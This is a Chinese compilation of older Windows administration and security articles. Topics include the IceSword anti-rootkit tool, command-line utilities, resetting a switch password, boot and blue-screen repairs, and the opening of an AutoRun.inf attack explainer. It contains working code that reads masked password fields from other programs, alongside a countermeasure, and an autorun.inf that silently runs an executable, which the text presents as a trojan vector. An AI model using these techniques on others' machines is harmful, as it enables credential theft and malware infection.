4、 IceSword的进程杀除强大且方便（当然也会有危险）。可轻易将选中的多个任意进程一并杀除。当然，说任意不确切，除去三个：idle进程、 System进程、csrss进程，原因就不详述了。其余进程可轻易杀死，当然有些进程（如winlogon）杀掉后系统就崩溃了。

5、对于端口工具，网上的确有很多，不过网上隐藏端口的方法也很多，那些方法对IceSword可是完全行不通的。其实本想带个防火墙动态查找，不过不想弄得太臃肿。这里的端口是指windows的IPv4 Tcpip协议栈所属的端口，第三方协议栈或IPv6栈不在此列。

目前一些流氓软件采取的手段无所不用其极：线程注入，进程隐藏，文件隐藏，驱动保护，普通用户想把文件给删了或者找出进程来，是非常困难的。有的是看到了，删不掉，杀不掉，干着急，实在不行，还需要从另外的作系统去删除文件。比如采取驱动保护的流氓软件如CNNIC，雅虎助手之类，.sys驱动加载的时候，它过滤了文件和注册表作，直接返回一个true,Windows提示文件删了，但一看，它还在那里。象一些文件删除工具如unclocker都无效。IceSword是目前所知唯一可以直接删除这类已经加载的驱动和采取注册表保护的工具。象清除CNNIC这类流氓软件，不需要重启也可以完成了。

IS采取了很多新颖的、内核级的方法和手段，关于它的技术细节不在本文讨论之列，下面主要从使用者角度讲一下它的主要功能：

■查看进程

包括运行进程的文件地址、各种隐藏的进程以及优先级。用它也可以轻易杀掉用任务管理器、Procexp等工具杀不掉的进程。还可以查看进程的线程、模块信息，结束线程等。

■查看端口

类似于cport、ActivePort这类工具，显示当前本地打开的端品以及相应的应用程序地址、名字。包括使用了各种手段隐藏端口的工具，在它下面，都一览无余。

■内核模块 加载到系统内和空间的PE模块，一般都是驱动程序*.sys，可以看到各种已经加载的驱动。包括一些隐藏的驱动文件，如IS自身的IsDrv118.sys，这个在资源管理器里是看不见的。

■启动组

Windows启动组里面的相关方式，这个比较容易理解了。不过可惜的是没有提示删除功能，只能查看。

■服务

用于查看系统中的被隐藏的或未隐藏的服务，隐藏的服务以红色显示。提供对服务的作如启动，停止，禁用等。

■SPI和BHO

这两个是目前流氓软件越来越看中的地方。SPI是服务提供接口，即所有Windows的网络作都是通过这个接口发出和接收数据包的。很多流氓软件把这个.dll替换掉，这样就可以监视所有用户访问网络的包，可以针对性投放一些广告。如果不清楚的情况下，把这个.dll删掉，会造成网络无法使用，上不了网。LSPFix等工具就是针对这个功能的。BHO就更不用说了，浏览器的辅助插件，用户启动浏览器的时候，它就可以自动启动，弹出广告窗口什么的。这两项仅提供查看的功能。

■SSDT (System Service Descriptor Table)

系统服务描述表，内核级后门有可能修改这个服务表，以截获你系统的服务函数调用，特别是一些老的rootkit，像上面提到的ntrootkit通过这种hook实现注册表、文件的隐藏。被修改的值以红色显示，当然有些安全程序也会修改，比如regmon。

■消息钩子

若在dll中使用SetWindowsHookEx设置一全局钩子，系统会将其加载入使用user32的进程中，因而它也可被利用为无进程木马的进程注入手段。

■线程创建和线程终止监视

“监视进线程创建”将IceSword运行期间的进线程创建调用记录在循环缓冲里，“监视进程终止”记录一个进程被其它进程Terminate的情况。举例说明作用：一个木马或病毒进程运行起来时查看有没有杀毒程序如norton的进程，有则杀之，若IceSword正在运行，这个作就被记录下来，你可以查到是哪个进程做的事，因而可以发现木马或病毒进程并结束之。再如：一个木马或病毒采用多线程保护技术，你发现一个异常进程后结束了，一会儿它又起来了，你可用IceSword发现是什么线程又创建了这个进程，把它们一并杀除。中途可能会用到“设置”菜单项：在设置对话框中选中“禁止进线程创建”，此时系统不能创建进程或者线程，你安稳的杀除可疑进线程后，再取消禁止就可以了。

■注册表Regedit有什么不足？

说起Regedit的不足就太多了，比如它的名称长度限制，建一个全路径名长大于255字节的子项看看（编程或用其他工具，比如 regedt32），此项和位于它后面的子键在regedit中显示不出来；再如有意用程序建立的有特殊字符的子键regedit根本打不开。

IceSword中添加注册表编辑并不是为了解决上面的问题，因为已经有了很多很好的工具可以代替Regedit。IceSword中的“注册表”项是为了查找被木马后门隐藏的注册项而写的，它不受目前任何注册表隐藏手法的蒙蔽，真正可靠的让你看到注册表实际内容。

如CNNIC添加的HKLM\SYSTEM\CurrentControlSet\Services\dnport这个键值，就是通过它来加载cndport.sys这个驱动文件的。通过Regedit你删除会直接出错，根本无法删除。而用IS就可以轻易干掉。

■文件操作

IS的文件作有点类似于资源管理器，虽然作起来没有那么方便，但是它的独到功能在于具备反隐藏、反保护的功能。还有对安全的副作用是本来 system32\config\SAM等文件是不能拷贝也不能打开的，但IceSword是可以直接拷贝的。类似于已经加载的驱动，如CNNIC的 cdnport.sys这个文件，目前只有IS可以直接把它删除，其它无论什么方式，都无法破除驱动自身的保护。

即使对大多数有用的unlocker，CopyLock、KillBox都是无效的。利用Windows的系统还没有完全加载的删除机制，通过在 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager下增加PendingFileRenameOperations，这个是所有删除顽固文件工具的最后一招，但它也被驱动保护变得无效了。以前的情况就是需要重启启动到另外一个作系统下删除。

----那帮做流氓软件的可真是手段无所不用其及。

IceSword内部功能是十分强大的。可能您也用过很多类似功能的软件，比如一些进程工具、端口工具，但是现在的系统级后门功能越来越强，一般都可轻而易举地隐藏进程、端口、注册表、文件信息，一般的工具根本无法发现这些“幕后黑手”。IceSword使用大量新颖的内核技术，使得这些后门躲无所躲.

IceSword大量采用新颖技术，有别于其他普通进程工具，比如IceSword就可以结束除Idle进程、System进程、csrss进程这三个进程外的所有进程，就这一点，其他同类软件就是做不到的。当然有些进程也不是随便可以结束的，如系统的winlogon.exe进程，一旦杀掉后系统就崩溃了，这些也需要注意。

Nbtstat命令详解

1. 具体功能

该命令用于显示本地计算机和远程计算机的基于 TCP/IP(NetBT) 协议的 NetBIOS 统计资料、 NetBIOS 名称表和 NetBIOS 名称缓存。 NBTSTAT 可以刷新 NetBIOS 名称缓存和注册的 Windows Internet 名称服务 (WINS) 名称。使用不带参数的 NBTSTAT 显示帮助。

2. 语法详解

nbtstat [-a remotename] [-A IPaddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]

3. 参数说明

-a remotename 显示远程计算机的 NetBIOS 名称表， 其中， remote name 是远程计算机的 NetBIOS 计算机名称。 NetBIOS 名称表是运行在该计算机上的应用程序使用的 NetBIOS 名称列表。

-A IPaddress 显示远程计算机的 NetBIOS 名称表， 其名称由远程计算机的 IP 地址指定 ( 以小数点分隔 ) 。

-c 显示 NetBIOS 名称缓存内容、 NetBIOS 名称表及其解析的各个地址。

-n 显示本地计算机的 NetBIOS 名称表。 Registered 中的状态表明该名称是通过广播或 WINS 服务器注册的。

-r 显示 NetBIOS 名称解析统计资料。 在配置为使用 WINS 的 Windows 计算机上，该参数将返回已通过广播和 WINS 解析和注册的名称号码。

-R 清除 NetBIOS 名称缓存的内容并从 Lmhosts 文件中重新加载带有 #PRE 标记的项目。

-RR 重新释放并刷新通过 WINS 注册的本地计算机的 NetBIOS 名称。

-s 显示 NetBIOS 客户和服务器会话，并试图将目标 IP 地址转化为名称。

-S 显示 NetBIOS 客户和服务器会话，只通过 IP 地址列出远程计算机。

Interval 重新显示选择的统计资料，可以中断每个显示之间的 Interval 中指定的秒数。 按 Ctrl+C 停止重新显示统计信息。如果省略该参数， NBTSTAT 将只显示一次当前的配置信息。

如何注册DLL或OCX文件

大家注册DLL或OCX的方法应该用Regsvr32.exe，用得多了大家一定会觉得在运行中写一长串东西很是烦人吧！这里我向大家介绍一种麻烦一次方便“一生”的方法。这个方法只要右击你想注册或反注册的OCX或DLL就可以了。它的原理是通过修改注册表使右击OCX或DLL文件时出现注册和反注册的菜单项。

下面介绍这个方法

注册DLL文件：打开HKEY_CLASSES_ROOR\Dllfile，新建项shell，再其下新建Register。你会发现Register就是右键弹出的菜单名，再在其下建command，修改其“默认值”为Regsvr32 %1

反注册DLL文件：打开HKEY_CLASSES_ROOR\Dllfile，新建项shell，再其下新建Unregister，再在其下建command，修改其“默认值”为Regsvr32 %1 /u。

注册和反注册OCX文件打开HKEY_CLASSES_ROOR\OCXfile，然后其它的方法和上面的一样的了。

右击一个OCX或DLL试试看，出现了我们想要的Register和Unregister菜单项。

Activex注册和反注册工具——Regsvr32

使用过Activex的人都知道，Activex不注册是不能够被系统识别和使用的，一般安装程序都会自动地把它所使用的Activex控件注册，但如果你拿到的一个控件需要手动注册怎么办呢？如果修改注册表那就太麻烦了，在Windows的system文件夹下有一个regsvr32.exe的程序，它就是Windows自带的Activex注册和反注册工具。它的用法为：

regsver32详解

regsvr32 [/s] [/n] [/i(:cmdline)] dllname

其中dllname为activex控件文件名，建议在安装前拷贝到system文件夹下。

参数有如下意义：

/u——反注册控件

/s——不管注册成功与否，均不显示提示框

/c——控制台输出

/i——跳过控件的选项进行安装（与注册不同）

/n——不注册控件，此选项必须与/i选项一起使用

如笔者要注册一amovie.ocx控件，则打入regsvr32 amovie.ocx即可，要反注册它时只需使用regsvr32 /u amovie.ocx就行了。

regsvr32 /s APIINEX.dll 注册DLL文件

regsvr32 /s /u APIINEX.dll 卸载DLL文件

regsvr32 Shortcut.ocx 注册ocx文件

regsvr32 /u Shortcut.ocx 卸载ocx文件

/s .dll,.ocx 注册成功后不显示提示信息。

/u .dll,.ocx 卸载

可把注册控件的命令放入批处理文件中。

regedit /s adofre15.reg

直接把注册信息注入注册表。

破解交换机密码地全部过程

破解交换机密码地全部过程

交换机和路由器都需要有一定的安全保证，也就是说要及时为他们配置合理的密码，那么如果这个密码忘记了怎么办呢？笔者就遇到过这么一次，由于岗位调动，以前的网络管理员离开了本部门，却把交换机上设置了密码，而且没有告诉我这个接任的网络管理员。怎么办呢？送回厂商破解又太麻烦了。于是我亲手经历了一次破解密码的过程。

一、网络环境

公司使用实达的3500系列（具体型号是3548）交换机，在交换机上面连接了一台华为2621路由器，通过电信的光纤上网。实际情况这台实达3548交换机被以前的网络管理员设置了密码而没有告诉我。所以破解他的密码成为本篇文章的核心。

二、准备工作

由于整个工作需要断网，毕竟涉及到重新启动交换机等操作，所以选择时间在工作下班后的晚上23点。另外由于破解密码这类操作都必须使用CONSOLE控制台线来设置，所以地点只能是中心机房。笔者找到了实达3548设备的所有相关工具，包括安装说明与CONSOLE控制线等。

三、实战破解密码

根据笔者以往经验实达所有设备的使用和操作命令语句都应该和CISCO设备类似，所以原本以为按照破解CISCO设备密码的步骤就可以轻松搞定。谁知道一上手才发现原来差别还真不小。一般来说CISCO设备都是通过修改配置寄存器configuration register来实现破解密码的操作。在实达交换机中根本不存在配置寄存器configuration register这个概念。通过查询资料才发现，原来实达交换机是使用修改超级终端配置的方法来破解密码的。

第一步：将实达交换机的配套CONSOLE控制线连接到设备的CONSOLE管理接口。

第二步：将CONSOLE控制线的另一断连接到网络管理员调试使用的笔记本的COM串口上。

第三步：进入笔记本系统桌面，点“开始->所有程序->附件->通讯->超级终端”。

第四步：启动系统的超级终端后我们随便为新建立的连接起一个名字。

第五步：在连接设置处的“连接时使用”地方通过下拉菜单选择刚刚使用CONSOLE控制线连接的端口。例如COM1口。

第六步：在COM1属性设置窗口中我们对连接的参数进行配置。一般来说我们正常连接交换机应该采用每秒位数9600，数据位为8，奇偶校验是无，停止位是1，数据流控制是无。不过要是想破解实达交换机的密码的话就需要修改这些数值。将PC超级终端串口速率设成57600，其他和上面写的相同即可。

第七步：使用终端连接到交换机后，再打开交换机的电源，在交换机启动后进行自检时立即按下“ESC”键多次进入交换机的监控模式。终端界面将出现多个选项，包括一些基本的初始化设置。

小提示：

刚开始笔者按照第七步的步骤尝试并没有成功，超级终端界面总是显示很多个“。。。。。”。后来才发现原来交换机必须在超级终端连接后才能加电启动，如果先开交换机再用超级终端连接的话则无法进入监控模式。

第八步：根据菜单提示，将配置文件config.text上传（Upload）至网络管理员使用的笔记本，然后删除交换机上的配置文件Config.text。

第九步：在笔记本上打开刚下载的保存在系统硬盘中的config.text文件，将以下语句

enable secret level 1 5 !E,1u_;C9&-8U0H

enable secret level 15 5 *r_1u_;C3vW8U0H

删除然后保存退出。

第十步：根据交换机监控模式的提示，将笔记本上修改的config.text再下载（Download）到交换机中。

第十一步：重新将笔记本的超级终端串口速率设成9600，其他保持默认参数。交换机加电重启后，进入交换机配置界面，你就会发现我们可以重新配置交换机的密码了，包括远程TELNET的管理密码以及本机的特权密码。此后交换机的密码也将变成你刚刚配置的，而其它配置则保留不变，并不会影响任何使用。

小提示：

在实际使用中笔者发现使用实达3550交换机的监控模式中的上传和下载文件功能并不稳定，经常出现传输失败的提示。所以笔者索性直接在监控模式中将config.text删除，然后重新启动交换机重新配置所有交换机信息。这种情况适用于交换机自身配置不多也不复杂，另外网络管理员也需要对设置语句比较熟悉。

总结

经过本次实战破解交换机密码的操作，笔者再次明白了对于路由交换设备来说，不同厂商操作程序和步骤绝对是不同的，即使命令语句类似但是在其他高级操作上还是大相径庭的。因此本篇文章介绍的所有内容仅仅是针对实达路由器与交换机，如果你遇到的是其他设备则需要采取其他的方法来解决。

黑客非法探取密码的原理及安全防范

一、非法获取Password的原理

Edit控件是Windows的一个标准控件，当把其Password属性设为True时,就会将输入的内容屏蔽为星号，从而达到保护的目的。虽然我们看来都是星号，但程序中的Edit控件实际仍是用户输入的密码，应用程序可以获取该控件中的密码，其他应用程序也可以通过向其发送WM_GETTEXT或EM_GETLINE消息来获取Edit控件中的内容。黑客程序正是利用Edit控件的这个特性，当发现当前探测的窗口是Edit控件并且具有ES_PASSWORD属性时，则通过SendMessage向此窗口发送WM_GETTEXT或EM_GETLINE消息，这样Edit框中的内容就一目了然了。

二、黑客软件工作方法

首先要取得当前的窗口，并判断是否是Edit控件，一般多通过鼠标来指定要探测的窗口，例如在WM_MOUSEMOVE消息的响应函数中进行判断，现列举代码片段如下：

//将客户坐标转换成屏幕坐标

ClientToScreen(&point);

//返回一个包含指定屏幕坐标点的窗口

CWnd* pWnd = CWnd::WindowFromPoint(point);

if (pWnd)

{

//获取窗口句柄

HWND hwndCurr = pWnd->GetSafeHwnd();

if ((::GetWindowThreadProcessId (GetSafeHwnd(), NULL)) !=

(::GetWindowThreadProcessId (hwndCurr, NULL)))

{

char lpClassName[255];

//获取类名

if (::GetClassName(hwndCurr, lpClassName, 255))

{

//判断是否是Edit控件

if (0 == m_strWndClass.CompareNoCase("EDIT"))

{

//获取窗口风格

LONG lStyle = ::GetWindowLong(hwndCurr, GWL_STYLE);

//如果设置了ES_PASSWORD属性

if (lStyle & ES_PASSWORD)

{

char szText[255];

//通过掌握的句柄hwndCurr向此控件发送WM_GETTEXT消息

::SendMessage(hwndCurr, WM_GETTEXT, 255, (LPARAM)szText);

//密码已保存在szText中

m_strPassword = szText;

}

}

}

}

}

上述代码中值得注意的有以下几个关键地方：

ClientToScreen(&point);

CWnd* pWnd = CWnd::WindowFromPoint(point);

HWND hwndCurr = pWnd->GetSafeHwnd();

这三句代码可以获取当前鼠标位置所在窗口的窗口句柄，在SendMessage中要用到的。

这便是真正起作用的SendMessage了，其第一个参数指定了要接收消息的窗口句柄，我们已经通过上面的代码获取到了，第二个参数就是让Edit控件返回字符的WM_GETTEXT消息了，并将得到的内容保存在szText中。

三、防范措施

既然我们搞清除了黑客软件普遍采取的手法，那我们自然能制订出一套防范其攻击的措施来。下面我们就要对Password进行保护。从以上分析我们可以看出：Edit控件的漏洞主要在于没有对发送WM_GETTEXT或EM_GETLINE消息者的身份进行检查，只要能找到Edit窗口句柄，任何进程都可获取其内容。所以必须要对发送消息者的身份进行验证，这里给出一种方法来验证发送消息者的身份是否合法：

1.创建新CEdit类

从CEdit继承一个子类CPasswordEdit，申明全局变量g_bSenderIdentity表明消息发送者的身份: BOOL g_bSenderIdentity;

然后响应CWnd的虚函数DefWindowProc，在这个回调函数中进行身份验证:

LRESULTCPasswordEdit:efWindowProc (UINTmessage,WPARAMwParam,LPARAMlParam)

{ //对Edit的内容获取必须通过以下两个消息之一

if((message==WM_GETTEXT)

||(message==EM_GETLINE)) { //检查是否为合法

if(!g_bSenderIdentity)

{

//非法获取,显示信息

AfxMessageBox(_T ("报告：正在试图窃取密码！"));

return 0;

}

//合法获取

g_bSenderIdentity=FALSE;

}

return CEdit:efWindowProc (message,wParam,lParam);

}

2.在数据输入对话框中做些处理

在对话框中申明一个类成员

m_edtPassword:CpasswordEdit m_edtPassword;

然后在对话框的OnInitDialog()中加入下列代码:

m_edtPassword.SubclassDlgItem(IDC_EDIT_PASSWORD,this);

将控制与新类做关联。之后要在对话框的数据交换函数中将身份设为合法:

void CDlgInput:oDataExchange (CDataExchange＊pDX)

{ //如果获取数据

//注意：对于CPropertyPage类这里不需要if (pDX->m_bSaveAndValidate)条件

if(pDX->m_bSaveAndValidate)

{

g_bSenderIdentity=TRUE;

}

CDialog:oDataExchange(pDX);

//{{AFX_DATA_MAP(CDlgInput)

DDX_Text (pDX,IDC_EDIT_PASSWORD,m_sPassword); //}}AFX_DATA_MAP

}

这样，Password输入框就拥有了合法身份，会受到保护。

结论

以上的方法仅针对VC程序，对于其他语言如VB、Delphi等语言，需要借助VC做一个Password的ActiveX控件，实现方法与上述方法基本类似。以上程序均用VisualC＋＋6.0编制调试通过。

系统安全之 NTLDR 丢失故障问题的解决

系统安全之 NTLDR 丢失故障问题的解决

服务器系统出现这样的提示“NTLDR is missing,Press any key to restart”首先到正常的同样的系统搜索“NTLDR”，三个文件全在C盘的根目录下，将这三个文件拷到故障服务器的C盘根目录下，重新启动电脑，故障还没有解决,这里要用到“故障恢复控制台”来修复故障。具体操作如下：　　

1.用Windows 2000的安装盘启动电脑，进入Windows 2000 Server的安装界面；　

2.界面提示“要修复Windows 2000中文版的安装，请按R”，按R键继续；　　

3.界面提示“要用故障恢复控制台修复Windows 2000安装”选项，按C键继续；　　

4.屏幕出现故障恢复控制台提示“C:/Winnt，要登录到哪个Windows 2000安装(要取消，请按Enter)？”，在此键入“1”，然后按Enter键；　　

5.键入管理员密码，然后按Enter键；　　

6.键入

Copy F:/Simpchin/Windows2000/Server/I386/Ntldr c:/

按ENTER键(注：笔者使用的光盘是Windows 2000三合一光盘，如果是其他的安装盘，可以使用搜索命令查找一下ntldr文件的位置，一般在i386目录下。“f:”为我的光盘驱动器号)；　　

7.键入

Copy F:/Simpchin/Windows2000/Server/I386/Ntldr c:/

按 Enter 键，系统提示您是否覆盖文件，键入Y，然后按Enter键。　　

重新启动计算机，当上课铃响起的时候，服务器已启动正常。

关于WINDOWS故障恢复控制台RC的介绍

Windows 故障恢复控制台的功能是帮助基于Windows 的计算机在未正确启动或根本无法启动时进行恢复操作。在安全模式和其他启动方法都无效时，您可以考虑使用故障恢复控制台。

进入RC的方式：

1.直接通过从 Windows XP 光盘启动来运行故障恢复控制台：

请按照下列步骤操作：

将 Windows XP 启动盘插入软盘驱动器，或将 Windows XP 光盘插入 CD-ROM 驱动器，然后重新启动计算机。

在出现相应提示时，单击以选中从 CD-ROM 驱动器启动计算机所需的所有选项。

出现“欢迎使用安装程序”屏幕时，按 R 键启动故障恢复控制台。如果您使用的是双启动或多启动计算机，请选择需要从故障恢复控制台访问的安装。根据提示，键入管理员密码。如果管理员密码为空，只需按 Enter 键。在命令提示符下，键入相应的命令以诊断和修复 Windows XP 安装。要查看故障恢复控制台提供的命令的列表，请在命令提示符下键入故障恢复控制台命令或 help，然后按 Enter 键。

要查看有关特定命令的信息，请在命令提示符下键入 help 命令名，然后按 Ente键。

要退出故障恢复控制台并重新启动计算机，请在命令提示符下键入 exit，然后Enter 键。

2.更为方便的做法是将它设置为启动菜单中的启动选项：

要安装故障恢复控制台，请执行下面的步骤：

将 Windows XP 光盘插入 CD-ROM 驱动器。

单击开始，然后单击运行。

在打开框中，键入 d：\i386\winnt32.exe /cmdcons，其中 d 是 CD-ROM 驱动器的驱动器号。

此时出现“Windows 安装”对话框，其中显示了故障恢复控制台选项。系统提示您确认安装。单击是开始安装过程。重新启动计算机。下次启动计算机时，您将在启动菜单上看到“Microsoft Windows 故障恢复控制台”项。

注意：您也可以通过一个网络共享位置使用 UNC 安装故障恢复控制台。

Windows的十四个非法操作详解

1、停止错误编号：0x0000000A

说明文字：IRQL-NOT-LESS-OR-EQUAL

通常的原因：驱动程序使用了不正确的内存地址。

解决方法：如果无法登陆，则重新启动计算机。当出现可用的作系统列表时，按F8键。在Windows高级选项菜单屏幕上，选择“最后一次正确的配置”，然后按回车键。

检查是否正确安装了所有的新硬件或软件。如果这是一次全新安装，请与硬件或软件的制造商联系，获得可能需要的任何Windows更新或驱动程序。

运行由计算机制造商提供的所有的系统诊断软件，尤其是内存检查。

禁用或卸掉新近安装的硬件(RAM，适配器，硬盘，调制解调器等等)，驱动程序或软件。

确保硬件设备驱动程序和系统BIOS都是最新的版本。

确保制造商可帮助你是否具有最新版本，也可帮助你获得这些硬件。

禁用BIOS内存选项，例如cache或shadow。

2、停止错误编号：0x0000001E

说明文字：KMODE-EXPTION-NOT-HANDLED

通常的原因：内核模式进程试图执行一个非法或未知的处理器指令。

解决方法：确保有足够的空间，尤其是在执行一次新安装的时候。

如果停止错误消息指出了某个特定的驱动程序，那么禁用他。如果无法启动计算机。应试着用安全模式启动，以便删除或禁用该驱动程序。

如果有非Microsoft支持的视频驱动程序，尽量切换到标准的VGA驱动程序或Windows提供的适当驱动程序。

禁用所有新近安装的驱动程序。

确保有最新版本的系统BIOS。硬件制造商可帮助确定你是否具有最新版本，也可以帮助你获得他。

BIOS内存选项，例如cache，shadow。

3、停止错误编号：0x00000023或0x00000024

说明文字：FAT-FILE-SYSTEM或MTFS-FILE-SYSTEM

通常原因：问题出现在Ntfs。sys(允许系统读写NTFS驱动器的驱动程序文件)内。

解决方法：运行由计算机制造商提供的系统诊断软件，尤其是硬件诊断软件。

禁用或卸载所有的反病毒软件，磁盘碎片整理程序或备份程序。

通过在命令提示符下运行Chkdsk/f命令检查硬盘驱动器是否损坏，然后重新启动计算机。

4、停止编号：0x0000002E

说明文字：DATA-BUS-ERROR

通常的原因：系统内存奇偶校验出错，通常由硬件问题导致。

解决方法：卸掉所有新近安装的硬件(RAM。适配器。硬盘。调制解调器等等)。

运行由计算机制造商提供的系统诊断软件，尤其是硬件诊断软件。

确保硬件设备驱动程序和系统BIOS都是最新版本。

使用硬件供应商提供的系统诊断，运行内存检查来查找故障或不匹配的内存。

禁用BIOS内存选项，例如cache或shadow。

在启动后出现可用作系统列表时，按F8。在Windows高级选项菜单屏幕上，选择“启动VGA模式”。然后按回车键。如果这样做还不能解决问题，可能需要更换不同的视频适配器列表，有关支持的视频适配器列表，请参阅硬件兼容性列表。

5、停止编号：0x0000003F

说明文字：NO-MOR-SYSTEM-PTES

通常的原因：每哟正确清理驱动程序。

解决方法：禁用或卸载所有的反病毒软件，磁盘碎片处理程序或备份程序。

6、停止错误编号：0x00000058

说明文字：FTDISK-INTERN-ERROR

通常的原因：容错集内的某个主驱动器发生故障。

解决方法：使用Windows安装盘启动计算机，从镜象(第2)系统驱动器引导。有关如何编辑Boot。ini文件以指向镜象系统驱动器的指导，可在MIcrosoft支持服务Web站点搜索“EditARCpath”。

7、停止错误编号：0x0000007B

说明文字：INACCESSI-BLE-BOOT-DEVICE

通常原因：初始化I/O系统(通常是指引导设备或文件系统)失败。

解决方法：引导扇区病毒通常会导致这种停止错误。是用反病毒软件的最新版本，检查计算机上是否有存在病毒。如果找到病毒，则必须执行必要的不找把他从计算机上清除掉，请参阅反病毒软件文档了解如何执行这些步骤。

卸下所有新近安装的硬件(RAM，适配器，调制解调器等等)。

核对MIcrosoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容。

如果使用的适SCSI适配器，可以从硬件供应商除获得最新WINDOWS驱动程序，禁用SCSI设备的同步协商，检查该SCSI链是否终结，并核对这些设备的SCSIID，如果无法确定如何执行能够这些步骤，可参考硬件设备的文档。

如果你用的是IDE设备，将板上的IDE端口定义为唯一的主端口。核对IDE设备的主/从/唯一设置。卸掉除硬盘之外的所有IDE设备。如果无法确认如何执行这些不找，可参考硬件文档。

如果计算机已使用NTFS文件系统格式化，可重新启动计算机，然后在该系统分区上运行Chkdsk/f/r命令。如果由于错误而无法启动系统，那么使用命令控制台，并运行Chkdsk/r命令。

运行Chkdsk/f命令以确定文件系统是否损坏。如果Windows不能运行Chkdsk命令，将驱动器移动到其他运行Windows的计算机上，然后从这台计算机上对该驱动器运行Chkdsk命令。

8、停止错误编号：0x0000007F

说明文字：UNEXPECTED-KERNEL-MODE-TRAP

通常的原因：通常是由于硬件或软件问题导致，但一般都由硬件故障引起的。

解决方法：核对Microsoft硬件兼容性列表以确保所有的硬件和驱动程序都与Windows兼容。如果计算机主板不兼容就会产生这个问题。

卸掉所由新近安装的硬件。

运行由计算机制造商提供的所有系统诊断软件，尤其是内存检查。

禁用BIOS内存选项，例如cache或shadow。

9、停止错误编号：0x00000050

说明文字：PAGE-FAULT-IN-NONPAGED-AREA

通常的原因：内存错误(数据不能使用分页文件交换到磁盘中)。

解决方法：卸掉所有的新近安装的硬件。

运行由计算机制造商提供的所有系统诊断软件。尤其是内存检查。

检查是否正确安装了所有新硬件或软件，如果这是一次全新安装，请与硬件或软件制造商联系，获得可能需要的任何Windows更新或驱动程序。

禁用或卸载所有的反病毒程序。

禁用BIOS内存选项，例如cache或shadow。

10、停止错误编号：0x00000077

说明文字：KERNEL-STEL-STACK-INPAGE-ERROR

通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。

解决方法：使用反病毒软件的最新版本，检查计算机上是否有病毒。如果找到病毒，则执行必要的步骤把他从计算机上清除掉。请参阅制造商提供的所有系统诊断软件，尤其是内存检查。

禁用BIOS内存选项，例如cache，shadow。

11、停止错误编号：0x00000079

说明文字：MISMATCHED-HAL

通常的原因：硬件抽象层与内核或机器类型不匹配（通常发生在单处理器和多处理器配置文件混合在同一系统的情况下）。

解决方法：要解决本错误，可使用命令控制台替换计算机上错误的系统文件。

单处理器系统的内核文件是Ntoskml。exe，而多处理器系统的内核文件是Ntkrnlmp。exe，但是，这些文件要与安装媒体上的文件相对应；在安装完Windows2000和，不论使用的是哪个原文件，都会被重命名为Ntoskrnl。exe文件。HAL文件在安装之后也使用名称Hal。dll但是在安装媒体，但是在安装媒体上却有若干个可能的HAL文件。

12、停止错误编号：0x0000007A

说明文字：KERNEL-DATA-INPAGE-ERROR

通常的原因：无法从分页文件将内核数据所需的页面读取到内存中。（通常是由于分页文件上的故障，病毒，磁盘控制器错误或由故障的RAM引起的）。

解决方法：使用反病毒软件的最新版本，检查计算机上是否存在病毒。如果找到病毒。则执行必要的步骤把他从计算机上清除掉，请参阅犯病度软件文档了解如何执行这些步骤。

如果计算机已使用NTFS文件系统格式化。可重新启动计算机，然后在该系统分区上运行Chkdsk/f/r命令。如果由于错误而无法启动命令，那么使用命令控制台，并运行Chkdsk/r命令。

运行由计算机制造商提供的所有的系统在很端软件，尤其是内存检查。

13、停止错误编号：0xC000021A

说明文字：STATUS-SYSTEM-PROCESS-TERMINATED

通常的原因：用户模式子系统，例如Winlogon或客户服务器运行时子系统（CSRSS）已被损坏，所以无法再保证安全性。

解决方法：卸掉所有新近安装的硬件。

如果无法登陆，则重新启动计算机。当出现可用的作系统列表时按F8。在Windows2000高级选项菜单屏幕上，选择：“最后一次正确的配置”。然后按会车。

运行故障恢复台，并允许系统修复任何检测到的错误。

14、停止错误编号：0xC0000221

说明文字：STATUS-IMAGE-CHECKISU7M-MISMATCH

通常的原因：驱动程序或系统DLL已经被损坏。

解决方法：运行故障复控台，并且允许系统修复任何检测到的错误。

如果在RAM添加到计算机之后，立即发生错误，那么可能是分页文件损坏，或者新RAM由故障或不兼容。删除Pagefile。sys并将系统返回到原来的RAM配置。

运行由计算机制造商提供的所有的系统诊断软件，尤其是内存检查。

技术分析系列之详解来自Autorun的攻击

最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法，由于AutoRun.inf文件在黑客技术中的应用还是很少见的，相应的资料也不多，有很多人对此觉得很神秘，本文试图为您解开这个迷，使您能完全的了解这个并不复杂却极其有趣的技术。

一、理论基础

经常使用光盘的朋友都知道，有很多光盘放入光驱就会自动运行，它们是怎么做的呢？光盘一放入光驱就会自动被执行，主要依靠两个文件，一是光盘上的AutoRun.inf文件，另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作，如果有的话，便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。

AutoRun.inf不光能让光盘自动运行程序，也能让硬盘自动运行程序，方法很简单，先打开记事本，然后用鼠标右键点击该文件，在弹出菜单中选择“重命名”，将其改名为AutoRun.inf，在AutoRun.inf中键入以下内容：


[AutoRun]　　　　//表示AutoRun部分开始，必须输入

Icon=C:\C.ico　　//给C盘一个个性化的盘符图标C.ico

Open=C:\1.exe　　//指定要运行程序的路径和名称，在此为C盘下的1.exe


保存该文件，按F5刷新桌面，再看“我的电脑”中的该盘符(在此为C盘)，你会发现它的磁盘图标变了，双击进入C盘，还会自动播放C盘下的1.exe文件！

解释一下：“[AutoRun]”行是必须的固定格式，“Icon”行对应的是图标文件，“C:\C.ico”为图标文件路径和文件名，你在输入时可以将它改为你的图片文件所在路径和文件名。另外，“.ico”为图标文件的扩展名，如果你手头上没有这类文件，可以用看图软件ACDSee将其他格式的软件转换为ico格式，或者找到一个后缀名为BMP的文件，将它直接改名为ICO文件即可。

“Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是，如果你要改变的硬盘跟目录下没有自动播放文件，就应该把“OPEN”行删掉，否则就会因为找不到自动播放文件而打不开硬盘，此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。

